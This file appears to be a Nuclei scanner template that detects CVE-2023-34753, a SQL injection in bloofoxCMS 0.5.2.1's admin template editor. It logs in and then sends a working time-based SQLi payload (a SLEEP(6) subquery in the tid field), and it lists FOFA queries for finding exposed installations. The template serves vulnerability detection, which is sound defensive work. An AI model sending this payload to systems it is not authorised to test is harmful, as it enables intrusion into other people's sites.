id: CVE-2023-34753

info:
  name: bloofoxCMS v0.5.2.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
  impact: |
    Authenticated attackers can exploit SQL injection through the tid parameter in the template settings page to extract database contents, manipulate CMS data, and potentially execute commands on the underlying database server.
  remediation: |
    Update bloofoxCMS to a version newer than 0.5.2.1 that uses parameterized queries or prepared statements for the tid parameter in admin/index.php template editing functionality.
  reference:
    - https://www.bloofox.com
    - https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34753
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34753
    cwe-id: CWE-89
    epss-score: 0.04228
    epss-percentile: 0.89719
    cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: bloofox
    product: bloofoxcms
    fofa-query:
      - "Powered by bloofoxCMS"
      - powered by bloofoxcms
  tags: time-based-sqli,cve,cve2023,sqli,bloofox,authenticated,vuln

http:
  - raw:
      - |
        POST /admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&action=login
      - |
        @timeout: 10s
        POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - contains(header_2, "text/html")
          - contains(body_2, 'bloofoxCMS Admincenter')
        condition: and
# digest: 4a0a00473045022100aeb572da4e3caa2fd3d350de3ce209681c0e40f1d402cde833740ef0c409e554022014a931c973de908f69c6bb68da2c23fc427003b0a04c5ad8bf0f3c4b604e1778:922c64590222798bb761d5b6d8e72950